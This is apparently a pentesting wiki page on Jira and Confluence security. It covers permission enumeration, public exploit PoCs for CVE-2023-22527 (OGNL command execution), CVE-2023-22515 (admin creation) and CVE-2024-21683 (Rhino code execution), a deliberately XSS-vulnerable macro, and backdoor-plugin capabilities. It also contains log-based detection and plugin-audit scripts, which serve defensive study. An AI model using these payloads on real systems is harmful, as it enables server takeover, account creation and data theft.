# Jira & Confluence

> [!TIP]
> Learn & practice AWS Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)\
> Learn & practice Azure Hacking: [**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow us** on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>

## Check Permissions

In Jira, permissions can be queried by any user, authenticated or not, through the `/rest/api/2/mypermissions` or `/rest/api/3/mypermissions` endpoints. They return the permissions of the caller. The interesting finding is an **unauthenticated** caller that gets `havePermission: true` on anything beyond what the instance intends to expose publicly; that is a security misconfiguration that is usually bounty-worthy. Unexpected grants for a low-privilege authenticated user (e.g. `ADMINISTER_PROJECTS` or `CREATE_SHARED_OBJECTS` for a plain user) are a finding too.

Since 1 February 2019 (Atlassian Cloud) the `mypermissions` endpoint requires a `permissions` query parameter naming the permission keys you are asking about, so that callers only receive the subset they requested. The permission keys that can be requested are:

  • ADD_COMMENTS
  • ADMINISTER
  • ADMINISTER_PROJECTS
  • ASSIGNABLE_USER
  • ASSIGN_ISSUES
  • BROWSE_PROJECTS
  • BULK_CHANGE
  • CLOSE_ISSUES
  • CREATE_ATTACHMENTS
  • CREATE_ISSUES
  • CREATE_PROJECT
  • CREATE_SHARED_OBJECTS
  • DELETE_ALL_ATTACHMENTS
  • DELETE_ALL_COMMENTS
  • DELETE_ALL_WORKLOGS
  • DELETE_ISSUES
  • DELETE_OWN_ATTACHMENTS
  • DELETE_OWN_COMMENTS
  • DELETE_OWN_WORKLOGS
  • EDIT_ALL_COMMENTS
  • EDIT_ALL_WORKLOGS
  • EDIT_ISSUES
  • EDIT_OWN_COMMENTS
  • EDIT_OWN_WORKLOGS
  • LINK_ISSUES
  • MANAGE_GROUP_FILTER_SUBSCRIPTIONS
  • MANAGE_SPRINTS_PERMISSION
  • MANAGE_WATCHERS
  • MODIFY_REPORTER
  • MOVE_ISSUES
  • RESOLVE_ISSUES
  • SCHEDULE_ISSUES
  • SET_ISSUE_SECURITY
  • SYSTEM_ADMIN
  • TRANSITION_ISSUES
  • USER_PICKER
  • VIEW_AGGREGATED_DATA
  • VIEW_DEV_TOOLS
  • VIEW_READONLY_WORKFLOW
  • VIEW_VOTERS_AND_WATCHERS
  • WORK_ON_ISSUES

Example: `https://your-domain.atlassian.net/rest/api/2/mypermissions?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS`

```bash
# Check non-authenticated privileges (Server/DC still answers without the parameter)
curl -s https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true'

# Cloud returns 400 without it, so name the keys you care about explicitly
curl -s 'https://your-domain.atlassian.net/rest/api/2/mypermissions?permissions=ADMINISTER,SYSTEM_ADMIN,ADMINISTER_PROJECTS,BROWSE_PROJECTS,CREATE_ISSUES' | jq '.permissions | to_entries[] | select(.value.havePermission) | .key'
```

## Automatic enumeration
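The following script is an added example (not code from the original page) that automates the check above: it queries `/rest/api/2/mypermissions` once anonymously and once with basic auth, always passes the `permissions` parameter required since 2019, and reports the keys that come back with `havePermission: true`. The target URL, the credentials and the embedded sample response are assumptions made for illustration; the response shape is the one Jira returns, abridged.

```python
import base64
import json
import sys
import urllib.request
from typing import Dict, Iterable, List, Optional

# Keys to ask about. Any of the first three granted to an anonymous caller is a critical finding.
PERMS = [
    "ADMINISTER", "SYSTEM_ADMIN", "ADMINISTER_PROJECTS",
    "BROWSE_PROJECTS", "CREATE_ISSUES", "EDIT_ISSUES", "DELETE_ISSUES",
    "CREATE_ATTACHMENTS", "USER_PICKER", "BULK_CHANGE", "CREATE_SHARED_OBJECTS",
]


def build_url(base: str, perms: Iterable[str], api_version: int = 2) -> str:
    """mypermissions URL carrying the 'permissions' query parameter that Cloud requires."""
    return f"{base.rstrip('/')}/rest/api/{api_version}/mypermissions?permissions={','.join(perms)}"


def granted(mypermissions_json: dict) -> List[str]:
    """Permission keys the response marks as havePermission: true, sorted for stable output."""
    perms = mypermissions_json.get("permissions", {})
    return sorted(key for key, info in perms.items() if info.get("havePermission") is True)


def fetch(url: str, user: Optional[str] = None, token: Optional[str] = None, timeout: int = 10) -> dict:
    """GET the endpoint anonymously, or with basic auth (user + API token / password) when given."""
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    if user and token:
        cred = base64.b64encode(f"{user}:{token}".encode()).decode()
        req.add_header("Authorization", f"Basic {cred}")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


def report(base: str, user: Optional[str] = None, token: Optional[str] = None) -> Dict[str, List[str]]:
    """Anonymous grants are the bug; the authenticated list shows what a low-privilege user gets on top."""
    url = build_url(base, PERMS)
    anon = granted(fetch(url))
    auth = granted(fetch(url, user, token)) if user and token else []
    return {"anonymous": anon, "authenticated": auth}


# Constructed sample in the shape Jira returns (abridged), so the parser can be exercised offline.
SAMPLE_RESPONSE = {
    "permissions": {
        "BROWSE_PROJECTS": {"id": "10", "key": "BROWSE_PROJECTS", "type": "PROJECT", "havePermission": True},
        "CREATE_ISSUES": {"id": "11", "key": "CREATE_ISSUES", "type": "PROJECT", "havePermission": True},
        "ADMINISTER": {"id": "0", "key": "ADMINISTER", "type": "GLOBAL", "havePermission": False},
    }
}

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("usage: mypermissions.py https://jira.example.com [user api_token]")
        print("offline demo, granted:", granted(SAMPLE_RESPONSE))
    else:
        base, user, token = (sys.argv + [None, None])[1:4]
        print(json.dumps(report(base, user, token), indent=2))
```

Run it against a target with just the base URL for the anonymous view, or add a user and API token to see the authenticated delta; anything in the `anonymous` list that is not `BROWSE_PROJECTS` on a deliberately public project deserves a closer look.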

## Recent RCEs & practical exploitation notes (Confluence)

### CVE-2023-22527 – unauthenticated template/OGNL injection (CVSS 10.0)

- Affects Confluence Data Center/Server 8.0.x through 8.5.3 (fixed in 8.5.4 LTS, 8.6.0 and 8.7.1; Cloud is not affected). The Velocity template `text-inline.vm` is reachable without authentication under `/template/` and evaluates attacker-controlled OGNL.
- Short PoC (the command runs as the OS user that runs Confluence):

```bash
curl -k -i -X POST "https://confluence.target.com/template/aui/text-inline.vm" \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data 'label=aaa%27%2b#request.get("KEY_velocity.struts2.context").internalGet("ognl").findValue(#parameters.poc[0],{})%2b%27&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader("x-cmd",(new+freemarker.template.utility.Execute()).exec({"id"}))'
```

- The command output comes back in the `x-cmd` response header (hence `-i`), so no reflection in the body is needed. Replace `id` with a reverse shell payload.
- Scanner: nuclei template `http/cves/2023/CVE-2023-22527.yaml` (available in nuclei-templates ≥9.7.5).

### CVE-2023-22515 – broken access control: re-run setup and create an admin (auth bypass)

- Publicly reachable Confluence Data Center/Server 8.0.0–8.5.1 (fixed in 8.3.3, 8.4.3 and 8.5.2; Cloud is not affected) lets an unauthenticated attacker flip the `setupComplete` flag and re-run `/setup/setupadministrator.action` to create a new administrator account.
- Short exploit flow:
  1. `GET /server-info.action` (unauthenticated) to confirm the endpoint is reachable.
  2. Request `/server-info.action` with the parameter that flips the setup flag (`bootstrapStatusProvider.applicationConfig.setupComplete=false` in the public PoC referenced by CISA).
  3. `POST /setup/setupadministrator.action` with `fullName`, `email`, `username`, `password` and `confirm` (plus the `X-Atlassian-Token: no-check` header the setup form expects) to create the admin.
- Post-exploitation tells: a new account in the Confluence administrators group, and access-log entries for these two paths on an instance that finished setup long ago.
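Both CVEs above leave a clear trace in the Tomcat access log, so the defensive counterpart of the two PoCs is a few path rules over that log. The following is an added example (not from the original page or the vendor): it parses combined-format access-log lines, URL-decodes and lower-cases the request target, and flags direct hits on `/template/*.vm` (CVE-2023-22527) and on the `setupComplete=false` / `setupadministrator.action` pair (CVE-2023-22515). The log format and the sample lines are constructed for illustration; adjust `LOG_RE` to your log pattern.

```python
import re
from typing import Dict, Iterable, List
from urllib.parse import unquote

# Tomcat/Confluence combined access-log line: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Each rule: (CVE, reason, predicate over (method, url-decoded lower-cased target)).
RULES: List[tuple] = [
    ("CVE-2023-22527", "Velocity template requested directly under /template/",
     lambda m, t: t.startswith("/template/") and t.split("?", 1)[0].endswith(".vm")),
    ("CVE-2023-22515", "setupComplete flipped through server-info.action",
     lambda m, t: t.startswith("/server-info.action") and "setupcomplete=false" in t),
    ("CVE-2023-22515", "setup-wizard admin creation on an already configured instance",
     lambda m, t: m == "POST" and t.startswith("/setup/setupadministrator.action")),
]


def scan(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return one hit per (line, rule) match; unparseable lines are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        method = m.group("method")
        target = unquote(m.group("target")).lower()   # normalise %2F-style and case tricks
        for cve, reason, pred in RULES:
            if pred(method, target):
                hits.append({
                    "cve": cve, "ip": m.group("ip"), "ts": m.group("ts"),
                    "status": int(m.group("status")), "reason": reason,
                    "request": f"{method} {m.group('target')}",
                })
    return hits


def summarize(hits: List[Dict[str, object]]) -> Dict[str, int]:
    """Hit count per CVE, handy for a quick triage line."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h["cve"]] = counts.get(h["cve"], 0) + 1
    return counts


# Constructed sample lines (not real traffic): one 22527 attempt, one full 22515 sequence, two benign requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Jan/2024:10:01:12 +0000] "POST /template/aui/text-inline.vm HTTP/1.1" 200 512',
    '203.0.113.7 - - [16/Jan/2024:10:01:13 +0000] "GET /rest/api/user/current HTTP/1.1" 200 88',
    '198.51.100.9 - - [04/Oct/2023:08:15:41 +0000] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1" 302 0',
    '198.51.100.9 - - [04/Oct/2023:08:15:42 +0000] "POST /setup/setupadministrator.action HTTP/1.1" 302 0',
    '10.0.0.5 - - [04/Oct/2023:08:16:00 +0000] "GET /pages/viewpage.action?pageId=123 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    import sys
    source = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG
    for hit in scan(source):
        print(f'{hit["ts"]} {hit["ip"]} {hit["cve"]} {hit["status"]} {hit["request"]}  # {hit["reason"]}')
```

A legitimate first-time installation also posts to `/setup/setupadministrator.action`, so the third rule only means something on an instance that completed setup earlier; a 200 on a `.vm` template, on the other hand, has no benign explanation on a patched or unpatched server alike and is worth an immediate look.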

### CVE-2024-21683 – authenticated RCE via Code Macro language upload

- A Confluence administrator can upload a custom language definition in "Configure Code Macro". The file is evaluated server-side by the Rhino JavaScript engine, which exposes Java classes to the script, so arbitrary code runs as the Confluence user.
- For a shell, upload a `.js` language file with a payload such as:

```js
// Evaluated by Rhino when the language definition is processed; LiveConnect exposes java.* to the script
java.lang.Runtime.getRuntime().exec("id");
```

- Trigger it by selecting the malicious language in any Code Macro. The Metasploit module `exploit/multi/http/atlassian_confluence_rce_cve_2024_21683` automates auth + upload + exec.

## Atlassian Plugins

As shown in this blog, the documentation on Plugin modules ↗ describes the different plugin module types that can be implemented.

This is an example of the macro plugin type:

<details>

<summary>Macro plugin example</summary>

```java
package com.atlassian.tutorial.macro;

import com.atlassian.confluence.content.render.xhtml.ConversionContext;
import com.atlassian.confluence.macro.Macro;
import com.atlassian.confluence.macro.MacroExecutionException;

import java.util.Map;

public class helloworld implements Macro {

    public String execute(Map<String, String> map, String body, ConversionContext conversionContext) throws MacroExecutionException {
        if (map.get("Name") != null) {
            // The "Name" macro parameter is concatenated into HTML without escaping: stored XSS
            return ("<h1>Hello " + map.get("Name") + "!</h1>");
        } else {
            return "<h1>Hello World!</h1>";
        }
    }

    public BodyType getBodyType() { return BodyType.NONE; }

    public OutputType getOutputType() { return OutputType.BLOCK; }
}
```

</details>

These plugins can suffer from the usual web vulnerabilities such as XSS. The example above is vulnerable because it returns the user-supplied `Name` parameter inside the rendered HTML without encoding it, so any user allowed to edit a page that uses the macro can inject script into every viewer's session.

Once an XSS is found, [**this github repo**](https://github.com/cyllective/XSS-Payloads/tree/main/Confluence) has payloads to increase the impact of the XSS in Confluence.

## Backdoor Plugin

[**This post**](https://cyllective.com/blog/posts/atlassian-malicious-plugin) describes the (malicious) actions a rogue Jira plugin can perform. A [**code example is in this repo**](https://github.com/cyllective/malfluence).

These are some of the actions a malicious plugin can perform:

- **Hiding Plugins from Admins**: the malicious plugin can hide itself from the plugin manager page by injecting front-end JavaScript.
- **Exfiltrating Attachments and Pages**: it allows accessing and exfiltrating all the data.
- **Stealing Session Tokens**: add an endpoint that echoes the request headers in the response (cookie included) and JavaScript that calls it and leaks the cookies.
- **Command Execution**: yes, it is possible to create a plugin that executes code.
- **Reverse Shell**: or obtain a reverse shell.
- **DOM Proxying**: if Confluence sits inside a private network, it is possible to establish a connection through the browser of a user who has access and, for example, reach the server and execute commands through it.
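Because a backdoor plugin hides itself by tampering with the UPM page in the browser, a defender should enumerate plugins from the REST API, which that front-end trick cannot touch. The following is an added example (not code from the referenced post or repo): it fetches the Universal Plugin Manager listing at `/rest/plugins/1.0/`, keeps the user-installed (uploaded) plugins, and flags enabled ones whose key is not on an allowlist. The field names (`plugins`, `key`, `enabled`, `userInstalled`, `version`), the allowlist and the embedded sample are assumptions to verify against your own instance.

```python
import base64
import json
import urllib.request
from typing import Dict, Iterable, List

UPM_PATH = "/rest/plugins/1.0/"   # Universal Plugin Manager listing; needs an admin session/token


def fetch_plugins(base: str, user: str, token: str, timeout: int = 15) -> dict:
    """GET the UPM plugin list with basic auth. Assumption: your instance exposes it at UPM_PATH."""
    req = urllib.request.Request(base.rstrip("/") + UPM_PATH, headers={"Accept": "application/json"})
    cred = base64.b64encode(f"{user}:{token}".encode()).decode()
    req.add_header("Authorization", f"Basic {cred}")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


def user_installed(upm_json: dict) -> List[dict]:
    """Plugins an admin uploaded, as opposed to the ones bundled with the product."""
    return [p for p in upm_json.get("plugins", []) if p.get("userInstalled") is True]


def suspicious(upm_json: dict, allowlist: Iterable[str]) -> List[Dict[str, str]]:
    """Enabled, user-installed plugins whose key is not on the allowlist."""
    allowed = set(allowlist)
    return [
        {"key": p["key"], "name": p.get("name", ""), "version": p.get("version", "")}
        for p in user_installed(upm_json)
        if p.get("enabled") and p.get("key") not in allowed
    ]


# Constructed sample in the UPM response shape (abridged); note the vendor-looking key on the rogue plugin.
SAMPLE_UPM = {
    "plugins": [
        {"key": "com.atlassian.confluence.plugins.confluence-space-ia", "name": "Confluence Space IA",
         "enabled": True, "userInstalled": False, "version": "8.5.4"},
        {"key": "com.example.approved-macro", "name": "Approved Macro",
         "enabled": True, "userInstalled": True, "version": "1.2.0"},
        {"key": "com.atlassian.tutorial.macro", "name": "Confluence Helper",
         "enabled": True, "userInstalled": True, "version": "1.0.0"},
        {"key": "com.example.old-plugin", "name": "Old Plugin",
         "enabled": False, "userInstalled": True, "version": "0.9"},
    ]
}

ALLOWLIST = ["com.example.approved-macro"]   # keys your change-management records approve

if __name__ == "__main__":
    import sys
    data = fetch_plugins(*sys.argv[1:4]) if len(sys.argv) >= 4 else SAMPLE_UPM
    for p in suspicious(data, ALLOWLIST):
        print(f'UNEXPECTED user-installed plugin: {p["key"]} ({p["name"]} {p["version"]})')
```

Matching on the plugin key rather than the display name matters: a backdoor can call itself anything, and a `com.atlassian.*` prefix on a user-installed plugin is itself a red flag, since vendor plugins ship bundled and are not `userInstalled`.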

## References

- [Atlassian advisory – CVE-2023-22527 template injection RCE](https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-datacenter-and-confluence-server-1333990257.html)
- [CISA AA23-289A – Active exploitation of Confluence CVE-2023-22515](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-289a)